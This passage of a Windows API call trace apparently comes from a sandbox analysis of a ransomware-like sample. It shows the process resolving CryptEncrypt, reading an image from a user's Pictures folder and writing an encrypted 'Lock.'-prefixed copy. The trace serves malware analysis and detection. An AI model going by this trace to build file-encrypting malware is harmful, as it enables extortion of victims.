(HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dc8 [0249.406] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ef8 [0249.406] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ac0 [0249.406] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51658 | out: hHeap=0x970000) returned 1 [0249.406] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0249.406] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ac0 | out: hHeap=0x970000) returned 1 [0249.407] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0249.407] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51970 [0249.407] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54eb8 [0249.407] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b68 [0249.407] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dc8 [0249.407] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54df8 [0249.407] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a78 [0249.407] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b68 | out: hHeap=0x970000) returned 1 [0249.407] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0249.407] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a78 | out: hHeap=0x970000) returned 1 [0249.407] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0249.407] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51aa8 [0249.407] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ec8 [0249.407] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0249.407] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x11) returned 0x2e698c8 [0249.407] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x2e698c8, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyHash", lpUsedDefaultChar=0x0) returned 17 [0249.407] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51aa8 | out: hHeap=0x970000) returned 1 [0249.407] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e541e8 [0249.407] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e698c8 | out: hHeap=0x970000) returned 1 [0249.407] GetProcAddress (hModule=0x756e0000, lpProcName="CryptDestroyHash") returned 0x756ff0e0 [0249.407] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e541e8 | out: hHeap=0x970000) returned 1 [0249.407] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0249.407] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a48 [0249.408] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ec8 [0249.408] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0249.408] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a48 | out: hHeap=0x970000) returned 1 [0249.408] CryptDestroyHash (hHash=0xa876d0) returned 1 [0249.408] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e561a8 [0249.408] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f08 [0249.408] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54df8 [0249.408] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518f8 [0249.408] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519b8 [0249.408] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51928 [0249.408] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ec8 [0249.408] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51928 | out: hHeap=0x970000) returned 1 [0249.408] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0249.408] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519b8 | out: hHeap=0x970000) returned 1 [0249.408] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519e8 [0249.408] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518e0 [0249.408] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ad8 [0249.408] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dc8 [0249.408] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ad8 | out: hHeap=0x970000) returned 1 [0249.408] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0249.409] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0249.409] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e58 [0249.409] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51688 [0249.409] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51820 [0249.409] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ec8 [0249.409] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0249.409] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e18 [0249.409] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0249.409] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0249.409] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0249.409] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d38 [0249.409] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51100 [0249.453] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51178 [0249.454] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e18 [0249.454] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512f8 [0249.454] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Pictures/k1wdGB_YAwU14UY.bmp" (normalized: "c:\\users\\fd1hvy\\pictures\\k1wdgb_yawu14uy.bmp"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2d0 [0249.455] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0249.455] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8cf2c0 | out: lpNewFilePointer=0x0) returned 1 [0249.455] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69a28 [0249.455] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0249.455] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c38 [0249.455] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0249.455] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0249.455] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c08 [0249.455] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51238 [0249.455] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510b8 [0249.455] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c38 [0249.455] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51178 [0249.456] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Pictures/" (normalized: "c:\\users\\fd1hvy\\pictures")) returned 0x11 [0249.457] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Pictures/Lock.k1wdGB_YAwU14UY.bmp" (normalized: "c:\\users\\fd1hvy\\pictures\\lock.k1wdgb_yawu14uy.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2a0 [0249.458] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69a48 [0249.459] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0249.459] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54be8 [0249.459] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0249.459] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0249.459] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77b08 [0249.459] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0249.459] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54be8 [0249.459] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510b8 [0249.459] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51238 [0249.459] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c08 [0249.462] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8cf4e4 | out: lpNewFilePointer=0x0) returned 1 [0249.462] ReadFile (in: hFile=0x2d0, lpBuffer=0x3be0048, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x3be0048*, lpNumberOfBytesRead=0x8cf4f8*=0x9006, lpOverlapped=0x0) returned 1 [0249.465] ReadFile (in: hFile=0x2d0, lpBuffer=0x3be0048, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x3be0048*, lpNumberOfBytesRead=0x8cf4f8*=0x0, lpOverlapped=0x0) returned 1 [0249.465] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51268 | out: hHeap=0x970000) returned 1 [0249.465] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c08 | out: hHeap=0x970000) returned 1 [0249.465] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51178 | out: hHeap=0x970000) returned 1 [0249.465] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c08 [0249.465] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x9006) returned 0x2f14010 [0249.466] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0xe54020 | out: hHeap=0x970000) returned 1 [0249.468] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51238 | out: hHeap=0x970000) returned 1 [0249.468] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51100 | out: hHeap=0x970000) returned 1 [0249.468] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510b8 | out: hHeap=0x970000) returned 1 [0249.468] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54be8 | out: hHeap=0x970000) returned 1 [0249.468] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ff8 | out: hHeap=0x970000) returned 1 [0249.468] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c48 | out: hHeap=0x970000) returned 1 [0249.468] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514c0 | out: hHeap=0x970000) returned 1 [0249.468] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c48 [0249.469] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x9006) returned 0x2f1d020 [0249.469] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f14010 | out: hHeap=0x970000) returned 1 [0249.469] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c08 | out: hHeap=0x970000) returned 1 [0249.469] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0249.469] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54be8 [0249.469] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514c0 [0249.469] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51340 [0249.469] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c08 [0249.470] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54de8 [0249.470] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x9006) returned 0x2f14010 [0249.470] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c08 | out: hHeap=0x970000) returned 1 [0249.470] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f14010 | out: hHeap=0x970000) returned 1 [0249.470] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0249.470] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51340 | out: hHeap=0x970000) returned 1 [0249.470] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514c0 | out: hHeap=0x970000) returned 1 [0249.470] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54be8 | out: hHeap=0x970000) returned 1 [0249.470] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0249.470] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c08 [0249.470] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54be8 [0249.470] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e698c8 [0249.470] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e698c8 | out: hHeap=0x970000) returned 1 [0249.470] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54be8 | out: hHeap=0x970000) returned 1 [0249.470] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c08 | out: hHeap=0x970000) returned 1 [0249.470] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77ac8 [0249.470] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0249.470] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54be8 [0249.470] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e56098 [0249.470] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c08 [0249.470] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0249.470] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e56098 | out: hHeap=0x970000) returned 1 [0249.470] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c08 | out: hHeap=0x970000) returned 1 [0249.470] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51340 [0249.470] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54c08 [0249.470] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51430 [0249.470] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51508 [0249.470] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ee8 [0249.471] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e88 [0249.471] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x9006) returned 0x2f14010 [0249.471] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0249.471] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54d98 [0249.471] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514c0 [0249.472] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0249.472] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0249.472] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0249.472] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0249.472] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0249.472] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0249.472] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0249.472] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54508 | out: hHeap=0x970000) returned 1 [0249.472] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0249.472] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0249.472] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0249.472] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55f10 | out: hHeap=0x970000) returned 1 [0249.472] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0249.472] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0249.472] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0249.473] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77788 | out: hHeap=0x970000) returned 1 [0249.473] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0249.473] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0249.473] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55d50 | out: hHeap=0x970000) returned 1 [0249.473] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0249.473] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0249.473] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0249.473] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0249.473] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51790 | out: hHeap=0x970000) returned 1 [0249.473] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0249.473] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0249.473] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0249.473] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0249.473] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77b48 | out: hHeap=0x970000) returned 1 [0249.473] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0249.473] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0249.473] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55c70 | out: hHeap=0x970000) returned 1 [0249.474] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0249.474] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0249.474] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0249.474] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0249.474] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x2e51af0, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0249.474] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51af0 | out: hHeap=0x970000) returned 1 [0249.475] GetProcAddress (hModule=0x756e0000, lpProcName="CryptEncrypt") returned 0x75712cf0 [0249.475] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a90 | out: hHeap=0x970000) returned 1 [0249.475] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0249.475] CryptEncrypt (in: hKey=0xa87690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x8cef60*=0x9006, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x8cef60*=0x9008) returned 1 [0249.475] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e561a8 [0249.475] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54508 [0249.475] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fa8 [0249.475] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b50 [0249.475] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a18 [0249.475] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51958 [0249.475] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55048 [0249.475] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51958 | out: hHeap=0x970000) returned 1 [0249.475] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0249.475] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a18 | out: hHeap=0x970000) returned 1 [0249.475] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ad8 [0249.475] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b68 [0249.475] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51958 [0249.475] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55048 [0249.475] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51958 | out: hHeap=0x970000) returned 1 [0249.475] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0249.475] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b68 | out: hHeap=0x970000) returned 1 [0249.476] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519a0 [0249.476] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51988 [0249.476] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51958 [0249.476] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55008 [0249.476] HeapFree (in: hHeap=0x970000, 